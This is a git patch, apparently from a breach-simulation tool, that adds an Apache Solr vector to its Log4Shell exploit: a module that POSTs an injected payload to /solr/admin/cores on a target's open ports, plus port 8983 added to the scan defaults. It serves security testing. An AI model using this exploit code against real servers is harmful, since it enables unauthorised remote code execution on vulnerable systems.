From 563438c7f86cd2de908e79e6a4e7a3c44835d0a0 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski <ilija.la@live.com>
Date: Wed, 5 Jan 2022 12:37:08 +0100
Subject: [PATCH] Agent, Island: Add Apache Solr support for Log4Shell exploit

---
 .../log4shell_utils/requests/__init__.py      |  3 ++-
 .../exploit/log4shell_utils/requests/solr.py  | 25 +++++++++++++++++++
 .../cc/services/config_schema/internal.py     |  2 +-
 3 files changed, 28 insertions(+), 2 deletions(-)
 create mode 100644 monkey/infection_monkey/exploit/log4shell_utils/requests/solr.py

diff --git a/monkey/infection_monkey/exploit/log4shell_utils/requests/__init__.py b/monkey/infection_monkey/exploit/log4shell_utils/requests/__init__.py
index e6a289d5c..08b7e3253 100644
--- a/monkey/infection_monkey/exploit/log4shell_utils/requests/__init__.py
+++ b/monkey/infection_monkey/exploit/log4shell_utils/requests/__init__.py
@@ -1,3 +1,4 @@
 from .poc_docker import trigger_exploit as exploit_poc
+from .solr import trigger_exploit as exploit_solr
 
-exploits = [exploit_poc]
+exploits = [exploit_poc, exploit_solr]
diff --git a/monkey/infection_monkey/exploit/log4shell_utils/requests/solr.py b/monkey/infection_monkey/exploit/log4shell_utils/requests/solr.py
new file mode 100644
index 000000000..ca5d31875
--- /dev/null
+++ b/monkey/infection_monkey/exploit/log4shell_utils/requests/solr.py
@@ -0,0 +1,25 @@
+from logging import getLogger
+from typing import List
+
+import requests
+
+from infection_monkey.model import VictimHost
+
+logger = getLogger(__name__)
+
+
+def trigger_exploit(payload: str, host: VictimHost, open_ports: List[int]):
+    urls = build_urls(open_ports, host)
+    payload = {"foo": payload}
+    for url in urls:
+        try:
+            resp = requests.post(url, data=payload, timeout=5, verify=False)  # noqa DUO123
+        except requests.ReadTimeout as e:
+            logger.debug(f"Log4shell request failed {e}")
+
+
+def build_urls(open_ports: List[int], host: VictimHost) -> List[str]:
+    urls = []
+    for port in open_ports:
+        urls.append(f"http://{host.ip_addr}:{port}/solr/admin/cores")
+    return urls
diff --git a/monkey/monkey_island/cc/services/config_schema/internal.py b/monkey/monkey_island/cc/services/config_schema/internal.py
index 84baa6ca5..dff4e8a13 100644
--- a/monkey/monkey_island/cc/services/config_schema/internal.py
+++ b/monkey/monkey_island/cc/services/config_schema/internal.py
@@ -129,7 +129,7 @@ INTERNAL = {
                             "type": "array",
                             "uniqueItems": True,
                             "items": {"type": "integer"},
-                            "default": [80, 8080, 443, 8008, 7001, 9200],
+                            "default": [80, 8080, 443, 8008, 7001, 9200, 8983],
                             "description": "List of ports the monkey will check if are being used "
                             "for HTTP",
                         },